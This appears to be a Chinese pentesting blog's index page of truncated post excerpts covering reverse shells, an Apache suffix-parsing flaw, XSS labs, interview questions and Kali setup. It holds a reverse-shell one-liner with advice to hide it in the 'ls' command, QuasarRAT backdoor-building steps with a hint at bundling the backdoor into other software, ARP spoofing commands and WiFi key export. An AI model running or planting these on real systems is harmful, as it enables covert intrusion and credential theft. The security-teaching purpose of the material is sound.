白帽子九一

在渗透测试过程中我们需要把测试目标的shell反弹到我们的主机中，方便测试。比如在测试到命令注入时，可以反弹shell进行进一步测试。一、nc和bash在我们的主机上执行nc -lvp port表示显示执行过程监听端口在目标主机上执行bash -i >& /dev/tcp/ip/port 0>$1（扩展：可以把此命令嵌入到常用的 ls 命令，神不知鬼不觉的让对方给你建立一个反弹shell,岂不妙哉！）这样就可以在我们的主机上执行命令了二、nc和python在我

漏洞简介：  Apache HTTPD 支持一个文件拥有多个后缀，并为不同后缀执行不同的指令。比如，如下配置文件：AddType text/html .htmlAddLanguage zh-CN .cn其给.html后缀增加了media-type，值为text/html；给.cn后缀增加了语言，值为zh-CN。此时，如果用户请求文件index.cn.html，他将返回一个中文的html页面。以上就是Apache多后缀的特性。如果运维人员给.php后缀增加了处理器：AddHandler ap

hackbar 简介：firefox 浏览器的一个插件，可以帮劣渗透测试者完成 sql 注入、xss 漏洞注入。下载地址：https://github.com/HCTYMFF/hackbar2.1.3上传 hackbar 插件包到 kali 系统上：root@kali:~# unzip hackbar2.1.3-master.ziproot@kali:~# ls hackbar2.1.3-master #查看获得的内容{4c98c9c7-fc13-4622-b08a-a18923469c1c}.x

1.下载并配置Quasar下载地址：https://github.com/quasar/QuasarRAT/releases如何配置：https://github.com/quasar/Quasar/wiki/Getting-Started2.生成后门文件添加ip（注意是本机ip）和端口（未占用）如果要设置密码就不用勾上！！！点击右下角的Build Client生成exe后门文件：把此文件放到靶机上运行（此处玩法有很多，比如内置隐藏到x软件带动它启动，此处省略一万字。。。。）当此程序

WINDOWS查看端口命令cmd中netstat -an　　显示出电脑中所有被打开的端口列表netstat -ano　　显示出所有占用端口的列表netstat -ano | findstr "80"　　显示出80端口占用的详细情况tasklist | findstr "680"　　　　查询端口具体哪个应用占用...

安装命令：sudo apt-get install fcitx-googlepinyin如果安装过程中提示安装依赖关系有问题,执行：apt-get install -f

原文链接：https://mp.weixin.qq.com/s/RSod4XWxyzL32eNcrXLjUQ源码：python远程关机.pydef wake_up(request, mac='DC-4A-3E-78-3E-0A'): MAC = mac BROADCAST = "192.168.0.255" if len(MAC) != 17: raise ValueError("MAC address should be set as form 'XX-XX-

XSS原理：全称跨站脚本，某种意义上也是一种注入攻击，指攻击者在被攻击的页面上注入恶意脚本代码，受害者访问该页面时，恶意代码会在用户的浏览器上执行。xss不仅扩展javascript代码，还包括flash等其他脚本语言。xss攻击针对的是客户端的攻击，受害者是用户，网站管理员也是用户之一，攻击者可以假冒管理员身份对网站实施攻击。产生的危害有:盗取cookie，修改网页内容，网页挂马，利用网页重定向，xss蠕虫。第一关:没有输入框，那直接在url中写入一段js代码试试(get型)：<scri

真实IP地址识别1.CDNCDN全称是Content Delivery Network，即内容分发网络。其原理如下：某些大型网站在全国都会有很多用户，这些用户常常会向网站发送不同的请求，那么不同地域会具有不同的缓冲服务器来接收用户发送的流量。如果用户发送流量没有任何交互的数据，只是请求首页的话，此时根据用户所在地区来确定访问的高速缓存服务器，高速缓存服务器会返回对应的响应到用户的浏览器当中，比如广东。CDN通常存在用户很多的大型流量网站，通过它来解决我们服务器的瓶颈。2.判断CDN存在可以通过P

Gcow安全团队：https://cloud.tencent.com/developer/column/85233

我在这里介绍电脑上查看WiFi密码的方式为cmd命令，命令就两条：netsh wlan show profilenetsh wlan export profile folder=C:\ key=clear具体实现方法如下：1.首先从左下角的搜索出输入cmd2.以管理员身份运行3.输入 netsh wlan show profile 命令查看接口wlan上的wifi的信息4.输入 netsh wlan export profile folder=C:\ key=clear 把配置文

1.1 信息收集概述及分类1.2 Shodan 搜索引擎使用方法1.3 google 搜索引擎使用方法1.4 Maltego 收集子域名信息1.5 FOFA 搜索引擎使用方法工具：1、Nmap、图形界面 zenmap2、Nessus 漏洞扫描3、Nikto 漏洞扫描4、skipfish 漏洞扫描5、AWVS 漏洞扫描6、Wireshark 抓包...

https://www.csdn.net/gather_27/MtjacgwsNjkwMTktYmxvZwO0O0OO0O0O.html

linux root密码找回方法一　　第1步：在系统进入单用户状态，直接用passwd root去更改。　　第2步：用安装光盘引导系统，进行linux rescue状态，将原来/分区挂接上来,作法如下：　　cd /mnt mkdir hd mount -t auto /dev/hdaX(原来/分区所在的分区号) hd cd hd chroot ./ passwd root　　第3步：将本机的硬盘拿下来，挂到其他的linux系统上，采用的办法与第二种相同.　　linux root密码找回方法二　　

1.拿到一个待检测的站，你觉得应该先做什么？收集信息whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙、维护者信息另说…2.mysql的网站注入，5.0以上和5.0以下有什么区别？5.0以下没有information_schema这个系统表，无法列表名等，只能暴力跑表名。5.0以下是多用户单操作，5.0以上是多用户多操做。3.在渗透过程中，收集目标站注册人邮箱对我们有什么价值？丢社工库里看看有没有泄露密码，然后尝试用泄露的密码进行登录后台。

1.什么是WebShell?2.什么是网络钓鱼？3.你获取网络安全知识途径有哪些？4.什么是CC攻击？5.Web服务器被入侵后，怎样进行排查？6.dll文件是什么意思，有什么用？DLL劫持原理7.0day漏洞8.Rootkit是什么意思9.蜜罐10.ssh11.DDOS12.震网病毒：13.一句话木马14.Https的作用15.手工查找后门木马的小技巧16.描述OSI（开放系统互联基本参考模型）七层结构17.TCP和UDP的区别18.脱壳19.“人肉搜索”20.SYN

常见渗透测试工程师面试汇总1.自我介绍可根据自己的自身情况来介绍，把自己的优势说出来，缺点就不要说了。最好有挖洞经验或者提交过被收录的漏洞编号。2.你怎么挖掘到的漏洞，具体的步骤自己挖到的漏洞，最好说一些细节，还有漏洞的危害。3.linux的日志文件在哪里var下的log文件里面存放的日志文件4.怎么linux查看进程动态查询top静态查询ps aux5.linux怎么查看今天创建过什么历史文件的命令命令：history命令：find ./* -mtime -16.sql注入 说

https://blog.csdn.net/Fly_hps/article/details/80260302?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-8.channel_param&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-8.channel_p

填空题1.12345的二进制是()2.目前常用的HTTP版本是()3.Burpsuite是用什么语言编写的()4.Sqlmap工具中-D参数是什么意思()5.Tomcat通过部署()得到webshell6.请写出任意一个常见的一句话木马webshell()7.Nc监听本地TCP1234端口的命令是()8.Cmd命令行查看系统是否有隐藏用户的命令是()9.Mysql查询当前用户名的关键字(函数)为()()10.Postgresql、GlassFish、redis、snmp默认端口分别是()

先安装 dsniff ：apt-get install dsnifffping -asg 192.168.0.100/24 查看局域网中存活的主机先ping一下目标主机，看是否ping得通要攻击需要知到目标ip,网关（网关是啥？）,本机网卡（eth0）。arpspoof -i eth0 -t 目标IP 网关ps:如果出现arpspoof: couldn’t arp for host ，要把虚拟机设置成桥接，或者关闭目标防火墙。...

不知道什么原因，我的虚拟机上的kali linux 下载了vsftpd重启后，就连不上网了ifconfig后发现eth0网卡不见了此时可以使用 ifconfig eth0 up就可以使网卡重现但是发现它没有ipv4地址之后发现可以使用vim /etc/network/interfaces在该配置文件中添加auto eth0iface eth0 inet dhcp再重启网络服务/etc/init.d/networking restart就可以解决...

在 Kali 系统中自带癿源是官方癿的apt 源，经常会因为网络问题，导致无法安装或更新程序。而且国外的 apt 源使用起来速度是相当慢。因此直接使用国内的源来解决此问题。编辑 atp 源的配置文件：vim /etc/apt/sources.list如果配置文件中原有 kali 的官方源，则直接注释掉，或直接删除掉而后在配置文件末行中添加阿里云的 apt 源，如下两行：deb https://mirrors.aliyun.com/kali kali-rolling main non-free c

安装ssh工具1.打开终端键入如下命令：apt-get update apt-get install openssh-server2.选择Y继续执行启动SSH服务1.键入如下命令：/etc/init.d/ssh start注：重启命令与关闭命令如下：/etc/init.d/ssh restart #重启SSH服务或者service ssh start/etc/init.d/ssh stop #关闭SSH服务或者service ssh stop2.查

注意其中的 kali 才是主机名，root为用户名。修改命令如下：hostnamectl set-hostname 主机名bash

解决办法如图所示：